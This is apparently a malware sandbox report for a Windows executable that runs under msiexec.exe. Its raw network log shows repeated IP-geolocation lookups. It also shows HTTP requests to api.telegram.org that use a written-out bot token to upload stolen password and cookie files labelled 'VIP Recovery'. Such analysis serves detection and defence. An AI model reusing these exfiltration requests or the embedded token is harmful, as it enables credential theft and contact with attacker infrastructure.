                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1580&min_rtt=1572&rtt_var=606&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1781574&cwnd=229&unsent_bytes=0&cid=d8861ab330db1de4&ts=204&x=0"
                                                                                                                                            2025-01-10 16:17:36 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                                            Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            6192.168.2.759380104.21.80.14437864C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2025-01-10 16:17:38 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                                            Host: reallyfreegeoip.org
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            2025-01-10 16:17:38 UTC861INHTTP/1.1 200 OK
                                                                                                                                            Date: Fri, 10 Jan 2025 16:17:38 GMT
                                                                                                                                            Content-Type: text/xml
                                                                                                                                            Content-Length: 362
                                                                                                                                            Connection: close
                                                                                                                                            Age: 1840647
                                                                                                                                            Cache-Control: max-age=31536000
                                                                                                                                            cf-cache-status: HIT
                                                                                                                                            last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=SjQ21azwRgomDXkihh2k6TPzaCjiaVk1leoA%2B3odTmRVUBmkyaYAij07WCxW%2Bjq%2BZfDTjz3v1KMQa6q18Jysv2dvXkrE914Kk5TTh8JJ%2BP0d%2BbOHxVH23N%2BGYdjgKaqGfhnJazef"}],"group":"cf-nel","max_age":604800}
                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                            Server: cloudflare
                                                                                                                                            CF-RAY: 8ffdfa76c8bb42d2-EWR
                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1586&min_rtt=1571&rtt_var=620&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2847&recv_bytes=699&delivery_rate=1723730&cwnd=229&unsent_bytes=0&cid=0eb6c44cdf20644d&ts=149&x=0"
                                                                                                                                            2025-01-10 16:17:38 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                                            Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            7192.168.2.759382104.21.80.14437864C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2025-01-10 16:17:39 UTC61OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                                            Host: reallyfreegeoip.org
                                                                                                                                            2025-01-10 16:17:40 UTC857INHTTP/1.1 200 OK
                                                                                                                                            Date: Fri, 10 Jan 2025 16:17:39 GMT
                                                                                                                                            Content-Type: text/xml
                                                                                                                                            Content-Length: 362
                                                                                                                                            Connection: close
                                                                                                                                            Age: 1840649
                                                                                                                                            Cache-Control: max-age=31536000
                                                                                                                                            cf-cache-status: HIT
                                                                                                                                            last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=E5JYLWnGij4tKyrLcfAzSZPLDa0QJl7AHQGJy1iM6%2FeZEaGCGFJpa0UvyeYStsbImji%2FHYEieCiz9kLBMjYnU6zayDH9SSTnVczZTi%2BFOB2T5wnDcmDlxzW4hMSGUAWFkgxBDOS%2B"}],"group":"cf-nel","max_age":604800}
                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                            Server: cloudflare
                                                                                                                                            CF-RAY: 8ffdfa80cdb942d2-EWR
                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1580&min_rtt=1571&rtt_var=607&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1776155&cwnd=229&unsent_bytes=0&cid=749beb2c203e9c2f&ts=149&x=0"
                                                                                                                                            2025-01-10 16:17:40 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                                            Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            8192.168.2.759384104.21.80.14437864C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2025-01-10 16:17:41 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                                            Host: reallyfreegeoip.org
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            2025-01-10 16:17:41 UTC853INHTTP/1.1 200 OK
                                                                                                                                            Date: Fri, 10 Jan 2025 16:17:41 GMT
                                                                                                                                            Content-Type: text/xml
                                                                                                                                            Content-Length: 362
                                                                                                                                            Connection: close
                                                                                                                                            Age: 1840650
                                                                                                                                            Cache-Control: max-age=31536000
                                                                                                                                            cf-cache-status: HIT
                                                                                                                                            last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=as%2F0GqKjeOClcH6tcKEqTtXxGQTPdNC7sdLmfVOebXqzmCuRdBlF7AqHGN3lsVrdEsSWN6IzOzSY1Kw6p7eT6OMktQse6l2qI%2Bum9UbJ9bMDT2vnEV2cM4aaEn6iwIwooQUZ7l6X"}],"group":"cf-nel","max_age":604800}
                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                            Server: cloudflare
                                                                                                                                            CF-RAY: 8ffdfa89ddd18c0f-EWR
                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=2114&min_rtt=2060&rtt_var=811&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1417475&cwnd=223&unsent_bytes=0&cid=753a258e98c0f9f4&ts=152&x=0"
                                                                                                                                            2025-01-10 16:17:41 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                                            Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            9192.168.2.759386104.21.80.14437864C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2025-01-10 16:17:42 UTC61OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                                            Host: reallyfreegeoip.org
                                                                                                                                            2025-01-10 16:17:42 UTC857INHTTP/1.1 200 OK
                                                                                                                                            Date: Fri, 10 Jan 2025 16:17:42 GMT
                                                                                                                                            Content-Type: text/xml
                                                                                                                                            Content-Length: 362
                                                                                                                                            Connection: close
                                                                                                                                            Age: 1840652
                                                                                                                                            Cache-Control: max-age=31536000
                                                                                                                                            cf-cache-status: HIT
                                                                                                                                            last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=P1j3TrvjJDp5sjumM87NoQsQ7dR%2F79gbJbNH7ncck4i%2BVPm58p7IBrGnFmymWpHPmi4%2BSeMX2XpaGyHCVXxEHiogtw7QNW3SdqQnyY2ZsbOVx6Hc5Rk%2BPbwgTtBb8KY9GOypOiF6"}],"group":"cf-nel","max_age":604800}
                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                            Server: cloudflare
                                                                                                                                            CF-RAY: 8ffdfa92fb8c8c0f-EWR
                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1928&min_rtt=1923&rtt_var=732&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1484494&cwnd=223&unsent_bytes=0&cid=63b28eb94f30f1bd&ts=160&x=0"
                                                                                                                                            2025-01-10 16:17:42 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                                            Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            10192.168.2.759388104.21.80.14437864C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2025-01-10 16:17:44 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                                            Host: reallyfreegeoip.org
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            2025-01-10 16:17:44 UTC855INHTTP/1.1 200 OK
                                                                                                                                            Date: Fri, 10 Jan 2025 16:17:44 GMT
                                                                                                                                            Content-Type: text/xml
                                                                                                                                            Content-Length: 362
                                                                                                                                            Connection: close
                                                                                                                                            Age: 1840653
                                                                                                                                            Cache-Control: max-age=31536000
                                                                                                                                            cf-cache-status: HIT
                                                                                                                                            last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Wql9n9Eb6np2hC8HWFGQ6EHj5Lbb5otcYzBhbjjsCGziPn76AVUyj4%2BR9MLCukEbIF32VP2PXwpRHvZftnf8nH3EXzIXeKCy75KXFlIUj9ZxCQ%2FOrjkTB3XyjJvoUqUR%2FF61PVdE"}],"group":"cf-nel","max_age":604800}
                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                            Server: cloudflare
                                                                                                                                            CF-RAY: 8ffdfa9d3a3542d2-EWR
                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1571&min_rtt=1559&rtt_var=609&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1762220&cwnd=229&unsent_bytes=0&cid=516d9e798e8820d3&ts=159&x=0"
                                                                                                                                            2025-01-10 16:17:44 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                                            Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            11192.168.2.759389149.154.167.2204437864C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2025-01-10 16:17:45 UTC349OUTGET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:390120%0D%0ADate%20and%20Time:%2011/01/2025%20/%2000:31:01%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20390120%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1
                                                                                                                                            Host: api.telegram.org
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            2025-01-10 16:17:45 UTC344INHTTP/1.1 404 Not Found
                                                                                                                                            Server: nginx/1.18.0
                                                                                                                                            Date: Fri, 10 Jan 2025 16:17:45 GMT
                                                                                                                                            Content-Type: application/json
                                                                                                                                            Content-Length: 55
                                                                                                                                            Connection: close
                                                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                                            2025-01-10 16:17:45 UTC55INData Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 34 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 7d
                                                                                                                                            Data Ascii: {"ok":false,"error_code":404,"description":"Not Found"}


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            12192.168.2.759390149.154.167.2204437864C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2025-01-10 16:17:52 UTC352OUTPOST /bot7888983233:AAGHDGX41oFk6oqVx8IC3EbSn56Cf9Te8YI/sendDocument?chat_id=8150022612&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1
                                                                                                                                            Content-Type: multipart/form-data; boundary=------------------------8dd32380b8cca17
                                                                                                                                            Host: api.telegram.org
                                                                                                                                            Content-Length: 585
                                                                                                                                            2025-01-10 16:17:52 UTC585OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 33 32 33 38 30 62 38 63 63 61 31 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 50 57 5f 52 65 63 6f 76 65 72 65 64 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 66 72 6f 6e 74 64 65 73 6b 20 7c 20 56 49 50 20 52 65 63 6f 76 65 72 79 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 33 39 30 31 32 30 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 30 2f 30 31 2f 32 30 32 35 20 2f 20 31 31 3a 31 37
                                                                                                                                            Data Ascii: --------------------------8dd32380b8cca17Content-Disposition: form-data; name="document"; filename="PW_Recovered.txt"Content-Type: application/x-ms-dos-executablePW | user | VIP Recovery PC Name:390120Date and Time: 10/01/2025 / 11:17
                                                                                                                                            2025-01-10 16:17:52 UTC388INHTTP/1.1 200 OK
                                                                                                                                            Server: nginx/1.18.0
                                                                                                                                            Date: Fri, 10 Jan 2025 16:17:52 GMT
                                                                                                                                            Content-Type: application/json
                                                                                                                                            Content-Length: 539
                                                                                                                                            Connection: close
                                                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                                            2025-01-10 16:17:52 UTC539INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 36 34 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 38 38 38 39 38 33 32 33 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 43 68 65 63 68 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 43 68 65 63 68 6c 6c 6f 79 64 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 38 31 35 30 30 32 32 36 31 32 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 43 48 45 43 48 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 4c 4c 4f 59 44 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 43 48 45 43 48 5f 4c 4c 4f 59 44 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 32 35 38 37 32 2c 22 64 6f 63
                                                                                                                                            Data Ascii: {"ok":true,"result":{"message_id":164,"from":{"id":7888983233,"is_bot":true,"first_name":"Chech","username":"Chechlloydbot"},"chat":{"id":8150022612,"first_name":"CHECH","last_name":"LLOYD","username":"CHECH_LLOYD","type":"private"},"date":1736525872,"doc


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            13192.168.2.759391149.154.167.2204437864C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2025-01-10 16:17:54 UTC358OUTPOST /bot7888983233:AAGHDGX41oFk6oqVx8IC3EbSn56Cf9Te8YI/sendDocument?chat_id=8150022612&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0ACookies%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1
                                                                                                                                            Content-Type: multipart/form-data; boundary=------------------------8dd3255c2e76ef6
                                                                                                                                            Host: api.telegram.org
                                                                                                                                            Content-Length: 1282
                                                                                                                                            2025-01-10 16:17:54 UTC1282OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 33 32 35 35 63 32 65 37 36 65 66 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 43 6f 6f 6b 69 65 73 5f 52 65 63 6f 76 65 72 65 64 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 43 6f 6f 6b 69 65 73 20 7c 20 66 72 6f 6e 74 64 65 73 6b 20 7c 20 56 49 50 20 52 65 63 6f 76 65 72 79 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 33 39 30 31 32 30 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 30 2f 30 31 2f 32 30
                                                                                                                                            Data Ascii: --------------------------8dd3255c2e76ef6Content-Disposition: form-data; name="document"; filename="Cookies_Recovered.txt"Content-Type: application/x-ms-dos-executableCookies | user | VIP Recovery PC Name:390120Date and Time: 10/01/20
                                                                                                                                            2025-01-10 16:17:55 UTC388INHTTP/1.1 200 OK
                                                                                                                                            Server: nginx/1.18.0
                                                                                                                                            Date: Fri, 10 Jan 2025 16:17:55 GMT
                                                                                                                                            Content-Type: application/json
                                                                                                                                            Content-Length: 550
                                                                                                                                            Connection: close
                                                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                                            2025-01-10 16:17:55 UTC550INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 36 35 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 38 38 38 39 38 33 32 33 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 43 68 65 63 68 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 43 68 65 63 68 6c 6c 6f 79 64 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 38 31 35 30 30 32 32 36 31 32 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 43 48 45 43 48 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 4c 4c 4f 59 44 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 43 48 45 43 48 5f 4c 4c 4f 59 44 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 32 35 38 37 35 2c 22 64 6f 63
                                                                                                                                            Data Ascii: {"ok":true,"result":{"message_id":165,"from":{"id":7888983233,"is_bot":true,"first_name":"Chech","username":"Chechlloydbot"},"chat":{"id":8150022612,"first_name":"CHECH","last_name":"LLOYD","username":"CHECH_LLOYD","type":"private"},"date":1736525875,"doc


                                                                                                                                            Click to jump to process

                                                                                                                                            Click to jump to process

                                                                                                                                            Click to dive into process behavior distribution

                                                                                                                                            Click to jump to process

                                                                                                                                            Target ID:1
                                                                                                                                            Start time:11:15:13
                                                                                                                                            Start date:10/01/2025
                                                                                                                                            Path:C:\Users\user\Desktop\r5yYt97sfB.exe
                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                            Commandline:"C:\Users\user\Desktop\r5yYt97sfB.exe"
                                                                                                                                            Imagebase:0x400000
                                                                                                                                            File size:789'552 bytes
                                                                                                                                            MD5 hash:831A8A58088361D324C958970B8ED79C
                                                                                                                                            Has elevated privileges:true
                                                                                                                                            Has administrator privileges:true
                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                            Reputation:low
